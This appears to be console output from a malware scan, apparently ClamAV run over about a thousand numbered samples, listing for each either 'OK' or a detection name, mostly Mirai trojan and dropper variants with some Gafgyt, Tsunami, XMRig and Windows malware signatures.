## 775 Unix.Trojan.Mirai-7100807-0
## 766 Unix.Trojan.Mirai-7100807-0
## 770 Unix.Trojan.Mirai-7100807-0
## 761 Unix.Trojan.Mirai-7100807-0
## 764 Unix.Trojan.Mirai-7100807-0
## 767 Unix.Trojan.Mirai-7100807-0
## 768 Unix.Trojan.Mirai-7100807-0
## 760 Unix.Trojan.Mirai-7100807-0
## 771 Unix.Trojan.Mirai-7100807-0
## 772 Unix.Trojan.Mirai-7100807-0
## 762 Unix.Trojan.Mirai-7100807-0
## 774 Unix.Trojan.Mirai-7100807-0
## 840 Unix.Trojan.Mirai-7100807-0
## 780 Unix.Trojan.Mirai-7100807-0
## 773 Unix.Trojan.Mirai-7100807-0
## 769 Unix.Trojan.Mirai-7100807-0
## 778 Unix.Trojan.Mirai-7100807-0
## 992 OK
## 341 Unix.Dropper.Mirai-7464847-0
## 167 Unix.Dropper.Mirai-7464847-0
## 78 Unix.Dropper.Mirai-7464847-0
## 921 Unix.Dropper.Mirai-7464847-0
## 667 Unix.Dropper.Mirai-7464847-0
## 736 Unix.Dropper.Mirai-7464847-0
## 609 Unix.Trojan.Mirai-6981989-0
## 473 Unix.Dropper.Mirai-7464847-0
## 1027 Unix.Dropper.Mirai-7464847-0
## 247 Unix.Dropper.Mirai-7464847-0
## 929 Unix.Dropper.Mirai-7464847-0
## 407 Unix.Dropper.Mirai-7464847-0
## 782 Unix.Dropper.Mirai-7136288-0
## 374 Unix.Dropper.Mirai-7464847-0
## 626 Unix.Trojan.Mirai-9948345-0
## 668 Unix.Trojan.Mirai-9948345-0
## 604 Unix.Trojan.Mirai-9948345-0
## 1157 Unix.Dropper.Mirai-7135925-0
## 461 Unix.Trojan.Mirai-6981989-0
## 601 Unix.Trojan.Mirai-9950937-0
## 1015 Unix.Trojan.Mirai-9948345-0
## 673 Unix.Dropper.Mirai-7135957-0
## 33 Unix.Dropper.Mirai-7136288-0
## 137 Unix.Trojan.Mirai-9948345-0
## 287 Unix.Trojan.Mirai-9866113-0
## 528 OK
## 514 OK
## 1035 Unix.Trojan.Mirai-9950082-0
## 200 Unix.Trojan.Mirai-9950082-0
## 599 Unix.Trojan.Mirai-9950082-0
## 10 Unix.Trojan.Mirai-9950082-0
## 13 Unix.Trojan.Mirai-9950082-0
## 448 Unix.Trojan.Mirai-9950082-0
## 556 Unix.Trojan.Mirai-9950082-0
## 152 Unix.Trojan.Mirai-6981989-0
## 90 Unix.Trojan.Mirai-9950082-0
## 132 Unix.Trojan.Mirai-9950082-0
## 72 Unix.Trojan.Mirai-9940367-0
## 848 Unix.Dropper.Mirai-7136288-0
## 386 Unix.Trojan.Mirai-9950082-0
## 966 Unix.Trojan.Mirai-9950082-0
## 1128 OK
## 6 OK
## 206 OK
## 1125 Unix.Dropper.Mirai-7135965-0
## 726 Unix.Dropper.Mirai-7135965-0
## 321 Unix.Dropper.Mirai-7135965-0
## 304 Unix.Dropper.Mirai-7135928-0
## 612 Unix.Dropper.Mirai-7135965-0
## 1062 Unix.Dropper.Mirai-7135965-0
## 371 Unix.Dropper.Mirai-7135965-0
## 1043 Unix.Dropper.Mirai-7135965-0
## 364 Unix.Dropper.Mirai-7135957-0
## 827 Unix.Dropper.Mirai-7135965-0
## 1100 Unix.Dropper.Mirai-7135965-0
## 709 Unix.Dropper.Mirai-7135965-0
## 989 OK
## 851 OK
## 897 OK
## 293 OK
## 747 OK
## 74 OK
## 391 OK
## 280 OK
## 868 OK
## 594 OK
## 109 OK
## 575 OK
## 1057 OK
## 1040 OK
## 459 OK
## 950 OK
## 176 OK
## 228 Unix.Trojan.Gafgyt-6981154-0
## 270 Unix.Trojan.Mirai-6981169-0
## 492 Unix.Trojan.Mirai-6981169-0
## 862 Unix.Trojan.Mirai-6981169-0
## 634 Unix.Trojan.Gafgyt-6981154-0
## 659 OK
## 544 OK
## 1084 OK
## 1145 OK
## 1086 OK
## 787 OK
## 603 Unix.Dropper.Mirai-7135925-0
## 700 OK
## 329 OK
## 943 Unix.Dropper.Mirai-7135957-0
## 423 Unix.Trojan.Mirai-7138377-0
## 883 Unix.Dropper.Mirai-7135881-0
## 403 Unix.Dropper.Mirai-7135881-0
## 658 Unix.Dropper.Mirai-7135881-0
## 946 Unix.Dropper.Mirai-7135881-0
## 353 Unix.Dropper.Mirai-7135881-0
## 417 Unix.Dropper.Mirai-7135881-0
## 719 Unix.Dropper.Mirai-7135881-0
## 396 OK
## 825 OK
## 717 Unix.Trojan.Tsunami-9845728-0
## 605 OK
## 378 Unix.Trojan.Tsunami-9869508-0
## 669 OK
## 835 OK
## 830 OK
## 369 OK
## 291 Unix.Trojan.Mirai-7100807-0
## 399 OK
## 400 OK
## 20 OK
## 19 OK
## 288 OK
## 301 OK
## 370 OK
## 298 OK
## 89 Unix.Trojan.Mirai-9936831-0
## 922 Unix.Trojan.Mirai-7100807-0
## 558 OK
## 1130 Unix.Malware.Mirai-9950761-0
## 295 Unix.Malware.Mirai-9950761-0
## 186 Unix.Malware.Mirai-9950761-0
## 185 Unix.Malware.Mirai-9950761-0
## 1122 Unix.Trojan.Mirai-6981989-0
## 996 Unix.Malware.Mirai-9950761-0
## 744 Unix.Malware.Mirai-9950761-0
## 77 Unix.Malware.Mirai-9950761-0
## 1032 Unix.Dropper.Mirai-7136288-0
## 945 Unix.Malware.Mirai-9950761-0
## 334 Unix.Malware.Mirai-9950761-0
## 1114 OK
## 204 OK
## 1022 Unix.Dropper.Mirai-7135870-0
## 63 Unix.Trojan.Mirai-9894781-0
## 243 Unix.Trojan.Mirai-9894781-0
## 723 OK
## 923 OK
## 1127 OK
## 821 Unix.Trojan.Mirai-6981989-0
## 262 OK
## 801 OK
## 947 Unix.Trojan.Mirai-7666587-0
## 54 Unix.Dropper.Mirai-7135870-0
## 814 Unix.Dropper.Mirai-7135870-0
## 272 OK
## 445 Unix.Trojan.Mirai-7100807-0
## 522 OK
## 39 OK
## 733 OK
## 214 OK
## 879 Unix.Trojan.Mirai-6981989-0
## 926 OK
## 541 OK
## 805 Unix.Trojan.Mirai-9936831-0
## 112 Unix.Trojan.Mirai-7100807-0
## 198 Unix.Trojan.Mirai-7100807-0
## 642 Unix.Dropper.Mirai-7135858-0
## 144 OK
## 928 Unix.Dropper.Mirai-7135925-0
## 506 Unix.Trojan.Mirai-7100807-0
## 749 OK
## 1026 OK
## 1041 OK
## 1175 Unix.Dropper.Mirai-9965028-0
## 562 Unix.Trojan.Mirai-7100807-0
## 580 OK
## 896 OK
## 424 Unix.Trojan.Mirai-9936831-0
## 259 Unix.Trojan.Mirai-7100807-0
## 933 Unix.Trojan.Mirai-7100807-0
## 462 Unix.Dropper.Mirai-7135858-0
## 388 OK
## 397 OK
## 716 Unix.Trojan.Tsunami-9845728-0
## 607 OK
## 376 Unix.Trojan.Tsunami-9869508-0
## 671 OK
## 837 OK
## 832 OK
## 549 Unix.Malware.Mirai-9950761-0
## 1116 Unix.Malware.Mirai-9950761-0
## 799 Unix.Malware.Mirai-9950761-0
## 500 Unix.Malware.Mirai-9950761-0
## 499 Unix.Malware.Mirai-9950761-0
## 937 Unix.Malware.Mirai-9950761-0
## 529 Unix.Malware.Mirai-9950761-0
## 560 Unix.Trojan.Mirai-6981989-0
## 120 Unix.Malware.Mirai-9950761-0
## 249 Unix.Malware.Mirai-9950761-0
## 804 Unix.Trojan.Mirai-9940367-0
## 885 Unix.Dropper.Mirai-7136288-0
## 1109 Unix.Malware.Mirai-9950761-0
## 165 Unix.Malware.Mirai-9950761-0
## 628 OK
## 739 Unix.Dropper.Mirai-7135965-0
## 322 Unix.Dropper.Mirai-7135965-0
## 257 Unix.Dropper.Mirai-7135965-0
## 903 Unix.Dropper.Mirai-7135965-0
## 741 Unix.Dropper.Mirai-7135928-0
## 1078 Unix.Dropper.Mirai-7135965-0
## 707 Unix.Dropper.Mirai-7135965-0
## 151 Unix.Trojan.Mirai-6981989-0
## 196 Unix.Dropper.Mirai-7135965-0
## 1133 Unix.Dropper.Mirai-7135965-0
## 1171 Unix.Dropper.Mirai-7135957-0
## 680 Unix.Dropper.Mirai-7135965-0
## 326 Unix.Dropper.Mirai-7135965-0
## 967 Unix.Dropper.Mirai-7135965-0
## 34 Unix.Dropper.Mirai-7135965-0
## 608 OK
## 41 Win.Malware.Siscos-6993581-0
## 24 OK
## 384 Win.Malware.Temr-7070541-0
## 264 OK
## 1115 OK
## 712 OK
## 49 Txt.Trojan.XMRig-9915823-0
## 720 OK
## 375 OK
## 115 Unix.Dropper.Mirai-7135870-0
## 36 Unix.Trojan.Mirai-9894781-0
## 1097 Unix.Trojan.Mirai-9894781-0
## 925 Unix.Trojan.Mirai-9944704-0
## 244 Unix.Trojan.Mirai-9907011-0
## 379 Unix.Trojan.Mirai-7669677-0
## 22 Unix.Trojan.Mirai-6981989-0
## 117 OK
## 261 OK
## 238 Unix.Trojan.Mirai-7666587-0
## 880 Unix.Dropper.Mirai-7135870-0
## 303 Unix.Dropper.Mirai-7135870-0
## 1019 Unix.Trojan.Mirai-7669677-0
## 282 OK
## 62 Win.Malware.Redosdru-9770864-0
## 134 OK
## 1073 OK
## 1107 OK
## 650 Unix.Trojan.Mirai-9770090-0
## 662 Unix.Trojan.Mirai-7135937-0
## 624 Unix.Trojan.Mirai-7135937-0
## 173 Unix.Trojan.Mirai-7135937-0
## 57 Unix.Dropper.Mirai-7135925-0
## 818 Unix.Trojan.Mirai-7135937-0
## 820 Unix.Trojan.Mirai-7135937-0
## 418 Unix.Trojan.Mirai-6981989-0
## 678 Unix.Trojan.Mirai-7135937-0
## 1153 Unix.Trojan.Mirai-7135937-0
## 849 Unix.Trojan.Mirai-7135937-0
## 332 Unix.Trojan.Mirai-7135937-0
## 1023 Unix.Trojan.Mirai-7135937-0
## 987 Unix.Trojan.Mirai-7135937-0
## 697 Unix.Trojan.Mirai-7135937-0
## 856 OK
## 246 OK
## 82 Unix.Trojan.Mirai-9894781-0
## 392 Unix.Trojan.Mirai-9894781-0
## 503 OK
## 823 Unix.Trojan.Mirai-9946361-0
## 105 OK
## 315 OK
## 633 Unix.Trojan.Mirai-7666587-0
## 485 Unix.Trojan.Mirai-7669677-0
## 1091 Unix.Dropper.Mirai-7135870-0
## 35 Unix.Trojan.Mirai-9894781-0
## 187 Unix.Trojan.Mirai-9894781-0
## 698 OK
## 470 OK
## 359 Unix.Trojan.Mirai-7669677-0
## 191 Unix.Trojan.Mirai-6981989-0
## 645 OK
## 948 OK
## 252 Unix.Trojan.Mirai-7666587-0
## 859 Unix.Dropper.Mirai-7135870-0
## 1045 Unix.Dropper.Mirai-7135870-0
## 1017 Unix.Trojan.Mirai-7669677-0
## 1014 OK
## 474 Unix.Dropper.Mirai-7138865-0
## 786 Unix.Dropper.Mirai-7138865-0
## 661 Unix.Dropper.Mirai-7138865-0
## 1093 Unix.Dropper.Mirai-7138865-0
## 446 Unix.Dropper.Mirai-7138865-0
## 348 Unix.Dropper.Mirai-7138865-0
## 81 Unix.Dropper.Mirai-7138865-0
## 223 Unix.Dropper.Mirai-7138865-0
## 475 Unix.Dropper.Mirai-7138865-0
## 476 Unix.Dropper.Mirai-7138865-0
## 545 Unix.Dropper.Mirai-7136288-0
## 838 OK
## 181 Unix.Trojan.Gafgyt-6981156-0
## 755 Unix.Dropper.Mirai-7138865-0
## 713 OK
## 104 OK
## 76 OK
## 797 OK
## 207 OK
## 1143 Unix.Dropper.Mirai-7464847-0
## 222 Unix.Dropper.Mirai-7464847-0
## 488 Unix.Dropper.Mirai-7464847-0
## 442 Unix.Dropper.Mirai-7464847-0
## 961 Unix.Dropper.Mirai-7464847-0
## 205 Unix.Dropper.Mirai-7464847-0
## 269 Unix.Trojan.Mirai-6981989-0
## 487 Unix.Dropper.Mirai-7464847-0
## 1151 Unix.Dropper.Mirai-7464847-0
## 434 Unix.Dropper.Mirai-7464847-0
## 869 Unix.Dropper.Mirai-7464847-0
## 795 Unix.Dropper.Mirai-7464847-0
## 411 Unix.Dropper.Mirai-7464847-0
## 349 Unix.Dropper.Mirai-7464847-0